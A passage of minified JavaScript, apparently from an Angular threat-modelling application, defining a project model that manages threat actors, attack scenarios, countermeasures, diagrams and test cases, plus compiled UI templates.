Object]"===Object.prototype.toString.call(n)},isValue:function(n){return!this.isObject(n)&&!this.isArray(n)}},this.Data.Name||(this.Data.Name="New Project"),this.Data.Version||(this.Data.Version=D5.ProjectVersion),this.Data.ProgressTracker||(this.Data.ProgressTracker={}),this.Data.Participants||(this.Data.Participants=[]),this.Data.Tasks||(this.Data.Tasks=[]),this.Data.Notes||(this.Data.Notes=[]),this.Data.Settings||(this.Data.Settings={ThreatActorToAttackScenario:!0}),this.config=e,!this.projectAssetGroupId){let n=this.InitializeNewAssetGroup(e);this.Data.projectAssetGroupId=n.ID}const i=(n,r,c,d,T)=>{if(this.projectCopy&&this.changeLog.findIndex(k=>k.ID==n.ID&&k.Type==n.Type)<0&&!this.changeLog.some(k=>k.ID==n.ID&&k.Type>n.Type))if(n.Type==Ja.Removed){const k=this.changeLog.find(Y=>Y.ID==n.ID);let q=null;if(k)q=k.Name;else{const Y=this.projectCopy[r].find(te=>te.ID==n.ID);if(Y){const te=c.FromJSON(Y,this,this.Config);q=te&&te.GetLongName?te.GetLongName():Y.Name}}q?this.changeLog.push({Title:T,Name:q,ID:n.ID,Type:n.Type}):console.error("Missing object")}else{const k=this[d](n.ID);if(k){let q=k.Name;k.GetLongName&&(q=k.GetLongName()),this.changeLog.push({Title:T,Name:q,ID:n.ID,Type:n.Type})}}};this.AssetsChanged.subscribe(n=>setTimeout(()=>{i(n,"assetGroups",Zl,"GetAssetGroup","general.Asset")},200)),this.DiagramsChanged.subscribe(n=>setTimeout(()=>{i(n,"diagrams",as,"GetDiagram","general.Diagram")},200)),this.ContextElementsChanged.subscribe(n=>setTimeout(()=>{i(n,"contextElements",ns,"GetContextElement","general.Element")},200)),this.DFDElementsChanged.subscribe(n=>setTimeout(()=>{i(n,"dfdElements",lc,"GetDFDElement","general.Element")},200)),this.MyComponentsChanged.subscribe(n=>setTimeout(()=>{i(n,"components",rf,"GetComponent","general.Component")},200)),this.SystemThreatsChanged.subscribe(n=>setTimeout(()=>{i(n,"systemThreats",hM,"GetSystemThreat","general.SystemThreat")},200)),this.ThreatActorsChanged.subscribe(n=>setTimeout(()=>{i(n,"threatActors",jp,"GetThreatActor","general.ThreatActor")},200)),this.AttackScenariosChanged.subscribe(n=>setTimeout(()=>{i(n,"attackScenarios",Rc,"GetAttackScenario","general.AttackScenario")},200)),this.CountermeasuresChanged.subscribe(n=>setTimeout(()=>{i(n,"countermeasures",Jl,"GetCountermeasure","general.Countermeasure")},200)),this.MitigationProcessesChanged.subscribe(n=>setTimeout(()=>{i(n,"mitigationProcesses",zp,"GetMitigationProcess","general.MitigationProcess")},200)),this.TestCasesChanged.subscribe(n=>setTimeout(()=>{i(n,"testCases",Kg,"GetTestCase","general.TestCase")},200))}get projectAssetGroupId(){return this.Data.projectAssetGroupId}get Version(){return this.Data.Version}get TTModelerVersion(){return this.Data.TTModelerVersion}set TTModelerVersion(a){this.Data.TTModelerVersion=a}get ProgressTracker(){return this.Data.ProgressTracker}get ProgressStep(){return this.Data.ProgressStep}set ProgressStep(a){this.Data.ProgressStep=a}get FileChanged(){return this.fileChanged||this.Config.FileChanged}set FileChanged(a){this.fileChanged=a,a?this.DataChanged.emit():(this.changeLog=[],this.projectCopy=JSON.parse(JSON.stringify(this.ToJSON())))}get UserVersion(){return this.Data.UserVersion}set UserVersion(a){this.Data.UserVersion=a}get Participants(){return this.Data.Participants}set Participants(a){this.Data.Participants=a}get Tasks(){return this.Data.Tasks}set Tasks(a){this.Data.Tasks=a}get Notes(){return this.Data.Notes}set Notes(a){this.Data.Notes=a}get Image(){return this.Data.Image}set Image(a){this.Data.Image=a}get Settings(){return this.Data.Settings}GetProjectName(){return Gi.FromCamelCase(this.Name.replace(".ttmp",""))}GetCharScope(){return this.charScope}GetObjImpact(){return this.objImpact}GetSysContext(){return this.sysContext}GetAssetGroups(){return this.assetGroups}GetProjectAssetGroup(){return this.GetAssetGroups().find(a=>a.ID==this.projectAssetGroupId)}GetMyDatas(){return this.myData}GetThreatActors(){return this.threatActors}GetThreatSources(){return this.threatSources}GetSystemThreats(){return this.systemThreats}GetContextElements(){return Array.from(this.contextElementMap,([a,e])=>e)}GetDFDElements(){return Array.from(this.dfdElementMap,([a,e])=>e)}GetDiagrams(){return this.diagrams}GetHWDFDiagrams(){return this.GetDiagrams().filter(a=>[xn.Hardware,xn.DataFlow].includes(a.DiagramType))}GetHWDiagrams(){return this.diagrams.filter(a=>a.DiagramType==xn.Hardware)}GetDFDiagrams(){return this.diagrams.filter(a=>a.DiagramType==xn.DataFlow)}GetStacks(){return this.stacks}GetDevices(){return this.GetContextElements().filter(a=>a.Type==Aa.Device&&a instanceof Ou)}GetMobileApps(){return this.GetContextElements().filter(a=>a.Type==Aa.MobileApp&&a instanceof cf)}GetComponents(){return Array.from(this.componentMap,([a,e])=>e)}GetAttackScenarios(){return Array.from(this.attackScenarioMap,([a,e])=>e)}GetAttackScenariosApplicable(){return this.GetAttackScenarios().filter(a=>![_o.NotApplicable,_o.Duplicate].includes(a.ThreatState))}GetAttackScenariosNotApplicable(){return this.GetAttackScenarios().filter(a=>[_o.NotApplicable,_o.Duplicate].includes(a.ThreatState))}GetCountermeasures(){return Array.from(this.countermeasureMap,([a,e])=>e)}GetCountermeasuresApplicable(){return this.GetCountermeasures().filter(a=>![Ra.NotApplicable,Ra.Rejected,Ra.Duplicate].includes(a.MitigationState))}GetCountermeasuresNotApplicable(){return this.GetCountermeasures().filter(a=>[Ra.NotApplicable,Ra.Rejected,Ra.Duplicate].includes(a.MitigationState))}GetMitigationProcesses(){return this.mitigationProcesses}GetChecklists(){return this.checklists}GetTestCases(){return this.testCases}GetTesting(){return this.testing}get HasTesting(){return null!=this.testing}GetMyTags(){return this.myTags}GetMyTagCharts(){return this.myTagCharts}GetExportTemplates(){return this.exportTemplates}get Config(){return this.config}InitializeNewProject(){this.charScope=new dM({},this,this.config),this.objImpact=new mM({},this,this.config),this.sysContext=new pT({},this,this.config),this.threatSources=new uM({},this,this.config)}GetLog(){if(this.projectCopy){const a=this.ToJSON(),i=this.deepDiffMapper.map(this.projectCopy,a),n=c=>{Object.keys(c).forEach(d=>{const T=c[d];"object"==typeof T&&!Array.isArray(T)&&null!==T&&(0==Object.keys(T).length||this.deepDiffMapper.KEY_CHANGETYP in T&&0===T[this.deepDiffMapper.KEY_CHANGETYP]?delete c[d]:n(T),0==Object.keys(T).length&&delete c[d])})};n(i);const r=[];return Object.keys(i).forEach(c=>{"Data"===c?Object.keys(i[c]).forEach(d=>{r.push({ID:null,Title:d,Type:Ja.Changed})}):"config"===c?r.push({ID:null,Title:"side-nav.configuration",Type:Ja.Changed}):"charSope"===c?r.push({ID:null,Title:"dialog.transferproject.d.CharScope",Type:Ja.Changed}):"objImpact"===c?r.push({ID:null,Title:"dialog.transferproject.d.ObjImpact",Type:Ja.Changed}):"tagCharts"===c?r.push({ID:null,Title:"dialog.tagcharts.title",Type:Ja.Changed}):"exportTemplates"===c&&r.push({ID:null,Title:"pages.reporting.Templates",Type:Ja.Changed})}),[...this.changeLog,...r]}return[]}CreateDevice(){let a=ns.Instantiate(Aa.Device,this,this.Config);return this.AddContextElement(a),this.DevicesChanged.emit({ID:a.ID,Type:Ja.Added}),a}CreateMobileApp(){let a=ns.Instantiate(Aa.MobileApp,this,this.Config);return this.AddContextElement(a),this.MobileAppsChanged.emit({ID:a.ID,Type:Ja.Added}),a}AddContextElement(a){return!this.contextElementMap.has(a.ID)&&(this.contextElementMap.set(a.ID,a),!0)}DeleteContextElement(a){return!!this.contextElementMap.has(a.ID)&&(a.OnDelete(this,this.config),this.contextElementMap.delete(a.ID),this.ContextElementsChanged.emit({ID:a.ID,Type:Ja.Removed}),a instanceof Ou&&this.DevicesChanged.emit({ID:a.ID,Type:Ja.Removed}),a instanceof cf&&this.MobileAppsChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}GetContextElement(a){return this.contextElementMap.get(a)}GetContextElementRefs(){return this.GetContextElements().filter(a=>a instanceof As||a instanceof Hg)}MoveItemInContextElements(a,e){this.moveItemInMap("contextElementMap",a,e)}GetAssetGroup(a){return this.assetGroups.find(e=>e.ID==a)}CreateAssetGroup(a){let e=new Zl({},this,this.Config);return this.assetGroups.push(e),e.Name=Gi.FindUniqueName("Asset Group",this.assetGroups.map(i=>i.Name)),null!=a&&a.AddAssetGroup(e),e.Number=0==this.GetNewAssets().length?"1":(Math.max(...this.GetNewAssets().map(i=>Number(i.Number)).filter(i=>!isNaN(i)))+1).toString(),e.IsNewAsset=!0,this.AssetsChanged.emit({ID:e.ID,Type:Ja.Added}),e}DeleteAssetGroup(a){const e=this.assetGroups.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.assetGroups.splice(e,1),this.AssetsChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}InitializeNewAssetGroup(a){let e=(n,r)=>{let c=this.CreateMyData(r);return c.CopyFrom(n.Data),c.IsNewAsset=!1,c.Number=null,c},i=(n,r)=>{let c=this.CreateAssetGroup(r);return c.CopyFrom(n.Data),c.IsNewAsset=!1,c.Number=null,c.Data.assetGroupIDs=[],n.SubGroups.forEach(d=>{let T=i(d,c);c.AddAssetGroup(T)}),c.Data.associatedDataIDs=[],n.AssociatedData.forEach(d=>{let T=e(d,c);c.AddMyData(T)}),c};return i(a.AssetGroups,null)}GetMyData(a){return this.myData.find(e=>e.ID==a)}CreateMyData(a){let e=new Pu({},this,this.Config);return a&&a.AddMyData(e),this.myData.push(e),e.Name=Gi.FindUniqueName("Data",this.GetMyDatas().map(i=>i.Name)),e.Number=0==this.GetNewAssets().length?"1":(Math.max(...this.GetNewAssets().map(i=>Number(i.Number)).filter(i=>!isNaN(i)))+1).toString(),e.IsNewAsset=!0,this.MyDatasChanged.emit({ID:e.ID,Type:Ja.Added}),e}DeleteMyData(a){const e=this.myData.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.myData.splice(e,1),this.MyDatasChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}GetNewAssets(){return[...this.GetAssetGroups(),...this.GetMyDatas()].filter(a=>a.IsNewAsset)}GetThreatActor(a){return this.threatActors.find(e=>e.ID==a)}CreateThreatActor(){const a=new jp({},this,this.Config);return a.Name=Gi.FindUniqueName("Threat Actor",this.threatActors.map(e=>e.Name)),a.Likelihood=lr.Medium,a.Number=0==this.GetThreatActors().length?"1":(Math.max(...this.GetThreatActors().map(e=>Number(e.Number)))+1).toString(),this.threatActors.push(a),this.ThreatActorsChanged.emit({ID:a.ID,Type:Ja.Added}),a}DeleteThreatActor(a){const e=this.threatActors.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.threatActors.splice(e,1),this.ThreatActorsChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}GetSystemThreat(a){return this.systemThreats.find(e=>e.ID==a)}CreateSystemThreat(a){let e=new hM({},this,this.Config);return e.Name=Gi.FindUniqueName(a?a.Name:"Threat",this.GetSystemThreats().map(i=>i.Name)),e.ThreatCategory=a,e.Number=0==this.GetSystemThreats().length?"1":(Math.max(...this.GetSystemThreats().map(i=>Number(i.Number)))+1).toString(),this.systemThreats.push(e),this.SystemThreatsChanged.emit({ID:e.ID,Type:Ja.Added}),e}DeleteSystemThreat(a){const e=this.systemThreats.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.systemThreats.splice(e,1),this.SystemThreatsChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}AddDFDElement(a){return!this.dfdElementMap.has(a.ID)&&(this.dfdElementMap.set(a.ID,a),this.DFDElementsChanged.emit({ID:a.ID,Type:Ja.Added}),!0)}DeleteDDFElement(a){return!!this.dfdElementMap.has(a.ID)&&(a.OnDelete(this,this.config),this.dfdElementMap.delete(a.ID),this.DFDElementsChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}GetDFDElement(a){return this.dfdElementMap.get(a)}GetDFDElementRefs(){return this.GetDFDElements().filter(a=>a instanceof td||a instanceof zm)}FindDeviceOfDiagram(a){return this.GetDevices().find(e=>e.HardwareDiagram.ID==a.ID)}CreateDiagram(a){let e;a==xn.Hardware||a==xn.DataFlow?e=new Bg({},this,this.Config):(a==xn.Context||a==xn.UseCase)&&(e=new b2({},this,this.Config)),e.DiagramType=a;let i="Context";return a==xn.UseCase?i="Use Case":a==xn.Hardware?i="Hardware":a==xn.DataFlow&&(i="Data Flow"),e.Name=Gi.FindUniqueName(i+" Diagram",this.diagrams.filter(n=>n.DiagramType==a).map(n=>n.Name)),this.diagrams.push(e),this.DiagramsChanged.emit({ID:e.ID,Type:Ja.Added}),e}GetDiagram(a){return this.diagrams.find(e=>e.ID==a)}DeleteDiagram(a){const e=this.diagrams.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.diagrams.splice(e,1),this.DiagramsChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}FindDiagramOfElement(a){return this.GetDiagrams().find(e=>{var i;return null===(i=e.Elements)||void 0===i?void 0:i.GetChildrenFlat().some(n=>n.ID==a)})}AddComponent(a){return!this.componentMap.has(a.ID)&&(this.componentMap.set(a.ID,a),!0)}GetComponent(a){return this.componentMap.get(a)}CreateComponent(a){let e=new rf({},a,this,this.Config);return this.componentMap.set(e.ID,e),this.MyComponentsChanged.emit({ID:e.ID,Type:Ja.Added}),e}DeleteComponent(a){return!!this.componentMap.has(a.ID)&&(a.OnDelete(this,this.config),this.componentMap.delete(a.ID),this.AssetsChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}GetStack(a){return this.stacks.find(e=>e.ID==a)}CreateStack(a){let e=new Om({},this,this.Config);return e.ComponentTypeID=a,this.stacks.push(e),e}DeleteStack(a){const e=this.stacks.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.stacks.splice(e,1)),e>=0}GetAttackScenario(a){return this.attackScenarioMap.get(a)}CreateAttackScenario(a,e){let i=new Rc({},this,this.Config);return i.IsGenerated=e,i.Number=0==this.GetAttackScenarios().length?"1":(Math.max(...this.GetAttackScenarios().map(n=>Number(n.Number)))+1).toString(),i.ViewID=a,this.attackScenarioMap.set(i.ID,i),this.AttackScenariosChanged.emit({ID:i.ID,Type:Ja.Added}),i}DeleteAttackScenario(a){return!!this.attackScenarioMap.has(a.ID)&&(a.OnDelete(this,this.config),this.attackScenarioMap.delete(a.ID),this.AttackScenariosChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}CleanUpGeneratedAttackScenarios(){this.attackScenarioMap.forEach(a=>{a.IsGenerated&&this.attackScenarioMap.delete(a.ID)})}MoveItemAttackScenario(a,e){this.moveItemInMap("attackScenarioMap",a,e)}GetCountermeasure(a){return this.countermeasureMap.get(a)}CreateCountermeasure(a,e){let i=new Jl({},this,this.Config);return i.IsGenerated=e,i.Number=0==this.GetCountermeasures().length?"1":(Math.max(...this.GetCountermeasures().map(n=>Number(n.Number)))+1).toString(),i.ViewID=a,this.countermeasureMap.set(i.ID,i),this.CountermeasuresChanged.emit({ID:i.ID,Type:Ja.Added}),i}DeleteCountermeasure(a){return!!this.countermeasureMap.has(a.ID)&&(a.OnDelete(this,this.config),this.countermeasureMap.delete(a.ID),this.CountermeasuresChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}MoveItemCountermeasures(a,e){this.moveItemInMap("countermeasureMap",a,e)}GetMitigationProcess(a){return this.mitigationProcesses.find(e=>e.ID==a)}CreateMitigationProcess(){let a=new zp({},this,this.Config);return a.Number=0==this.mitigationProcesses.length?"1":(Math.max(...this.mitigationProcesses.map(e=>Number(e.Number)))+1).toString(),this.mitigationProcesses.push(a),a.Name=Gi.FindUniqueName("Mitigation Process",this.GetMitigationProcesses().map(e=>e.Name)),this.MitigationProcessesChanged.emit({ID:a.ID,Type:Ja.Added}),a}DeleteMitigationProcess(a){const e=this.mitigationProcesses.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.mitigationProcesses.splice(e,1),this.MitigationProcessesChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}GetChecklist(a){return this.checklists.find(e=>e.ID==a)}CreateChecklist(a,e){let i=new CM({},e,this,this.Config);return i.Name=e.Name,i.Description=e.Description,a.AddChecklist(i),this.checklists.push(i),i}DeleteChecklist(a){const e=this.checklists.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.checklists.splice(e,1)),e>=0}GetTestCase(a){return this.testCases.find(e=>e.ID==a)}CreateTestCase(){const a=new Kg({},this,this.Config);return a.Name=Gi.FindUniqueName("Test Case",this.testCases.map(e=>e.Name)),a.Number=0==this.GetTestCases().length?"1":(Math.max(...this.GetTestCases().map(e=>Number(e.Number)))+1).toString(),this.testCases.push(a),this.testing.AddTestCase(a),this.TestCasesChanged.emit({Type:Ja.Added,ID:a.ID}),a}DeleteTestCase(a){const e=this.testCases.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.testCases.splice(e,1),this.TestCasesChanged.emit({Type:Ja.Removed,ID:a.ID})),e>=0}CreateTesting(){this.testing||(this.testing=new fM({},this,this.config))}DeleteTesting(){this.testing&&(this.testing.OnDelete(this,this.config),this.testing=null)}GetExportTemplate(a){return this.exportTemplates.find(e=>e.ID==a)}CreateExportTemplate(){let a=new xT({},this,this.Config);return a.Name=Gi.FindUniqueName("Export Template",this.GetExportTemplates().map(e=>e.Name)),this.exportTemplates.push(a),a}DeleteExportTemplate(a){const e=this.exportTemplates.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.exportTemplates.splice(e,1)),e>=0}GetMyTag(a){return this.myTags.find(e=>e.ID==a)}CreateMyTag(){let a=new pM({},this,this.Config);return a.Name=Gi.FindUniqueName("Tag",this.GetMyTags().map(e=>e.Name)),this.myTags.push(a),a}DeleteMyTag(a){const e=this.myTags.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.myTags.splice(e,1)),e>=0}GetMyTagChart(a){return this.myTagCharts.find(e=>e.ID==a)}CreateMyTagChart(){let a=new wT({},this,this.Config);return a.Name=Gi.FindUniqueName("Tag Chart",this.GetMyTagCharts().map(e=>e.Name)),this.myTagCharts.push(a),a}DeleteMyTagChart(a){const e=this.myTagCharts.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.myTagCharts.splice(e,1)),e>=0}GetView(a){let e=this.GetDiagram(a);return e||(e=this.GetStack(a)),e}ConsistencyCheck(a){let e=[];const i=(r,c)=>{let d=[];r.forEach(T=>{var k,q;T.Number?d.includes(T.Number)?e.push(Gi.Format(a.instant("messages.error.inconsistency.project."+c+"multiNumber"),null===(q=T.GetDiagram())||void 0===q?void 0:q.Name,T.Number)):d.push(T.Number):e.push(Gi.Format(a.instant("messages.error.inconsistency.project."+c+"woNumber"),null===(k=T.GetDiagram())||void 0===k?void 0:k.Name,T.Name))})},n=(r,c)=>{let d=[];r.forEach(T=>{T.Number?d.includes(T.Number)?e.push(Gi.Format(a.instant("messages.error.inconsistency.project."+c+"multiNumber"),T.Number)):d.push(T.Number):e.push(Gi.Format(a.instant("messages.error.inconsistency.project."+c+"woNumber"),T.Name))})};return i(this.GetAttackScenarios(),"AS"),i(this.GetCountermeasures(),"CM"),n(this.GetMitigationProcesses(),"MP"),n(this.GetThreatActors(),"TS"),n(this.GetSystemThreats(),"ST"),n(this.GetTestCases(),"TC"),n(this.GetNewAssets(),"A"),e}moveItemInMap(a,e,i){let r=Array.from(this[a].entries());r.splice(i,0,r.splice(e,1)[0]),this[a]=new Map(r)}FindReferences(a,e){return null}OnDelete(a,e){}ToJSON(){var a;let e={Data:this.Data,charSope:this.charScope.ToJSON(),objImpact:this.objImpact.ToJSON(),sysContext:this.sysContext.ToJSON(),assetGroups:[],myData:[],threatActors:[],threatSources:this.threatSources.ToJSON(),systemThreats:[],contextElements:[],dfdElements:[],diagrams:[],stacks:[],components:[],attackScenarios:[],countermeasures:[],mitigationProcesses:[],checklists:[],testCases:[],testing:null===(a=this.testing)||void 0===a?void 0:a.ToJSON(),tags:[],tagCharts:[],exportTemplates:[],config:this.Config.ToJSON()};return this.assetGroups.forEach(i=>e.assetGroups.push(i.ToJSON())),this.myData.forEach(i=>e.myData.push(i.ToJSON())),this.threatActors.forEach(i=>e.threatActors.push(i.ToJSON())),this.systemThreats.forEach(i=>e.systemThreats.push(i.ToJSON())),this.contextElementMap.forEach(i=>e.contextElements.push(i.ToJSON())),this.dfdElementMap.forEach(i=>e.dfdElements.push(i.ToJSON())),this.diagrams.forEach(i=>e.diagrams.push(i.ToJSON())),this.stacks.forEach(i=>e.stacks.push(i.ToJSON())),this.componentMap.forEach(i=>e.components.push(i.ToJSON())),this.attackScenarioMap.forEach(i=>e.attackScenarios.push(i.ToJSON())),this.countermeasureMap.forEach(i=>e.countermeasures.push(i.ToJSON())),this.mitigationProcesses.forEach(i=>e.mitigationProcesses.push(i.ToJSON())),this.checklists.forEach(i=>e.checklists.push(i.ToJSON())),this.testCases.forEach(i=>e.testCases.push(i.ToJSON())),this.myTags.forEach(i=>e.tags.push(i.ToJSON())),this.myTagCharts.forEach(i=>e.tagCharts.push(i.ToJSON())),this.exportTemplates.forEach(i=>e.exportTemplates.push(i.ToJSON())),e}static FromJSON(a){var e,i,n,r,c,d,T,k,q,Y,te,pe,Re;const Fe=Wu.FromJSON(a.config),Ne=new uf(a.Data,Fe);return a.charSope&&(Ne.charScope=dM.FromJSON(a.charSope,Ne,Fe)),a.objImpact&&(Ne.objImpact=mM.FromJSON(a.objImpact,Ne,Fe)),null===(e=a.assetGroups)||void 0===e||e.forEach(et=>Ne.assetGroups.push(Zl.FromJSON(et,Ne,Fe))),null===(i=a.myData)||void 0===i||i.forEach(et=>Ne.myData.push(Pu.FromJSON(et,Ne,Fe))),null===(n=a.contextElements)||void 0===n||n.forEach(et=>Ne.contextElementMap.set(et.ID,ns.FromJSON(et,Ne,Fe))),a.dfdElements.forEach(et=>Ne.dfdElementMap.set(et.ID,lc.FromJSON(et,Ne,Fe))),a.diagrams.forEach(et=>Ne.diagrams.push(as.FromJSON(et,Ne,Fe))),a.sysContext&&(Ne.sysContext=pT.FromJSON(a.sysContext,Ne,Fe)),null===(r=a.threatActors)||void 0===r||r.forEach(et=>Ne.threatActors.push(jp.FromJSON(et,Ne,Fe))),a.threatSources&&(Ne.threatSources=uM.FromJSON(a.threatSources,Ne,Fe)),null===(c=a.systemThreats)||void 0===c||c.forEach(et=>Ne.systemThreats.push(hM.FromJSON(et,Ne,Fe))),a.components.forEach(et=>Ne.componentMap.set(et.ID,rf.FromJSON(et,Ne,Fe))),a.stacks.forEach(et=>Ne.stacks.push(Om.FromJSON(et,Ne,Fe))),null===(d=a.attackScenarios)||void 0===d||d.forEach(et=>Ne.attackScenarioMap.set(et.ID,Rc.FromJSON(et,Ne,Fe))),null===(T=a.countermeasures)||void 0===T||T.forEach(et=>Ne.countermeasureMap.set(et.ID,Jl.FromJSON(et,Ne,Fe))),null===(k=a.mitigationProcesses)||void 0===k||k.forEach(et=>Ne.mitigationProcesses.push(zp.FromJSON(et,Ne,Fe))),null===(q=a.checklists)||void 0===q||q.forEach(et=>Ne.checklists.push(CM.FromJSON(et,Ne,Fe))),null===(Y=a.testCases)||void 0===Y||Y.forEach(et=>Ne.testCases.push(Kg.FromJSON(et,Ne,Fe))),a.testing&&(Ne.testing=fM.FromJSON(a.testing,Ne,Fe)),null===(te=a.tags)||void 0===te||te.forEach(et=>Ne.myTags.push(pM.FromJSON(et,Ne,Fe))),null===(pe=a.tagCharts)||void 0===pe||pe.forEach(et=>Ne.myTagCharts.push(wT.FromJSON(et,Ne,Fe))),null===(Re=a.exportTemplates)||void 0===Re||Re.forEach(et=>Ne.exportTemplates.push(xT.FromJSON(et,Ne,Fe))),Ne.GetDFDElements().forEach(et=>{if(et instanceof Ys){let ut=et.GetChildren();ut.some(Ze=>null==Ze)&&(console.error("Uncleared reference"),et.Data.childrenIDs=ut.filter(Ze=>Ze).map(Ze=>Ze.ID))}}),Ne}}const sSe=["elementview"];function cSe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"app-container-tree",16,17),he("selectionChanged",function(n){return be(e),Me(B().selectedObject=n)})("filterChanged",function(n){return be(e),Me(B().filteredObject=n)}),u(),s(4,"\n              "),Mt()}if(2&t){const e=B();C(2),V("elements",e.GetContainer(e.selectedNode))("selectedElement",e.selectedObject)("filteredElement",e.filteredObject)}}function lSe(t,a){if(1&t){const e=Ye();s(0,"\n                    "),m(1,"table",21),he("mouseenter",function(){return be(e),Me(B().$implicit.isHovered=!0)})("mouseleave",function(){return be(e),Me(B().$implicit.isHovered=!1)})("dblclick",function(){return be(e),Me(B().$implicit.keepOpen=!0)}),s(2,"\n                      "),m(3,"tr"),s(4,"\n                        "),m(5,"td",22)(6,"mat-icon",23),s(7),u()(),s(8,"\n                        "),m(9,"td",24),s(10),u(),s(11,"\n                        "),m(12,"td",22)(13,"button",25),he("click",function(){be(e);const n=B().$implicit;return Me(B().RemoveTab(n))}),m(14,"mat-icon",23),s(15),u()()(),s(16,"\n                      "),u(),s(17,"\n                      "),m(18,"tr"),s(19,"\n                        "),m(20,"td",26),s(21),u(),s(22,"\n                      "),u(),s(23,"\n                    "),u(),s(24,"\n                  ")}if(2&t){const e=B().$implicit;C(7),ke(e.nav.icon),C(2),ri("font-style",e.keepOpen?"normal":"italic"),C(1),ke(e.label),C(5),ke(e.isHovered?"close":""),C(5),ri("font-style",e.keepOpen?"normal":"italic"),C(1),ke(e.nav.name())}}function dSe(t,a){if(1&t){const e=Ye();m(0,"app-model-info",37),he("refreshNodes",function(){return be(e),Me(B(3).createNodes())}),u()}}function mSe(t,a){1&t&&it(0,"app-char-scope",38),2&t&&V("charScope",B(2).$implicit.nav.data)}function uSe(t,a){1&t&&it(0,"app-obj-impact",39),2&t&&V("objImpact",B(2).$implicit.nav.data)}function hSe(t,a){1&t&&it(0,"app-threat-sources",40),2&t&&V("threatSources",B(2).$implicit.nav.data)}function fSe(t,a){1&t&&it(0,"app-threat-identification",41)}function pSe(t,a){if(1&t){const e=Ye();m(0,"app-device-assets",42),he("selectionChanged",function(n){return be(e),Me(B(3).selectedObject=n)}),u()}if(2&t){const e=B(2).$implicit,i=B();V("assetGroup",e.nav.data)("selectedObject",i.selectedObject)}}function _Se(t,a){if(1&t){const e=Ye();m(0,"app-diagram",43),he("selectionChanged",function(n){return be(e),Me(B(3).selectedObject=n)})("navTreeChanged",function(){return be(e),Me(B(3).createNodes())}),u()}if(2&t){const e=B(2).$implicit,i=B();V("selectedNode",i.selectedNode)("diagram",e.nav.data)("selectedElement",i.selectedObject)}}function gSe(t,a){if(1&t){const e=Ye();m(0,"app-stack",44,45),he("selectionChanged",function(n){return be(e),Me(B(3).selectedObject=n)}),u()}if(2&t){const e=B(2).$implicit,i=B();V("stack",e.nav.data)("selectedComponent",i.selectedComponent)}}function CSe(t,a){1&t&&it(0,"app-checklist",46),2&t&&V("checklist",B(2).$implicit.nav.data)}function ySe(t,a){1&t&&it(0,"app-testing",47),2&t&&V("testing",B(2).$implicit.nav.data)}function bSe(t,a){if(1&t&&(s(0,"\n                    "),ne(1,dSe,1,0,"app-model-info",27),s(2,"\n                    "),ne(3,mSe,1,1,"app-char-scope",28),s(4,"\n                    "),ne(5,uSe,1,1,"app-obj-impact",29),s(6,"\n                    "),ne(7,hSe,1,1,"app-threat-sources",30),s(8,"\n                    "),ne(9,fSe,1,0,"app-threat-identification",31),s(10,"\n                    "),ne(11,pSe,1,2,"app-device-assets",32),s(12,"\n                    "),ne(13,_Se,1,3,"app-diagram",33),s(14,"\n                    "),ne(15,gSe,2,2,"app-stack",34),s(16,"\n                    "),ne(17,CSe,1,1,"app-checklist",35),s(18,"\n                    "),ne(19,ySe,1,1,"app-testing",36),s(20,"\n                  ")),2&t){const e=B().$implicit,i=B();C(1),V("ngIf",i.IsModelInfo(e.nav)),C(2),V("ngIf",i.IsCharScope(e.nav)),C(2),V("ngIf",i.IsObjImpact(e.nav)),C(2),V("ngIf",i.IsThreatSource(e.nav)),C(2),V("ngIf",i.IsThreatIdentification(e.nav)),C(2),V("ngIf",i.IsAssetGroup(e.nav)),C(2),V("ngIf",i.IsDiagram(e.nav)),C(2),V("ngIf",i.IsMyComponentStack(e.nav)),C(2),V("ngIf",i.IsChecklist(e.nav)),C(2),V("ngIf",i.IsTesting(e.nav))}}function MSe(t,a){1&t&&(m(0,"mat-tab",18),s(1,"\n                  "),ne(2,lSe,25,8,"ng-template",19),s(3,"\n                  "),ne(4,bSe,21,10,"ng-template",20),s(5,"\n                "),u())}function vSe(t,a){if(1&t&&(s(0,"\n                    "),m(1,"span",53),s(2),oe(3,"translate"),u(),s(4,"\n                  ")),2&t){const e=B(2);C(1),V("matBadge",e.currentThreatCount)("matBadgeHidden",0==e.currentThreatCount),C(1),ke(re(3,3,"general.AttackScenarios"))}}function ASe(t,a){if(1&t&&(s(0,"\n                    "),m(1,"span",53),s(2),oe(3,"translate"),u(),s(4,"\n                  ")),2&t){const e=B(2);C(1),V("matBadge",e.currentCountermeasureCount)("matBadgeHidden",0==e.currentCountermeasureCount),C(1),ke(re(3,3,"general.Countermeasures"))}}function TSe(t,a){if(1&t&&(s(0,"\n                    "),m(1,"span",53),s(2),oe(3,"translate"),u(),s(4,"\n                  ")),2&t){const e=B(3);C(1),V("matBadge",e.currentTestCaseCount)("matBadgeHidden",0==e.currentTestCaseCount),C(1),ke(re(3,3,"general.TestCases"))}}function ESe(t,a){if(1&t){const e=Ye();m(0,"mat-tab"),s(1,"\n                  "),ne(2,TSe,5,5,"ng-template",49),s(3,"\n                  "),m(4,"app-test-case-table",54),he("selectedObjectChanged",function(n){return be(e),Me(B(2).selectedObject=n)})("testCaseCountChanged",function(n){return 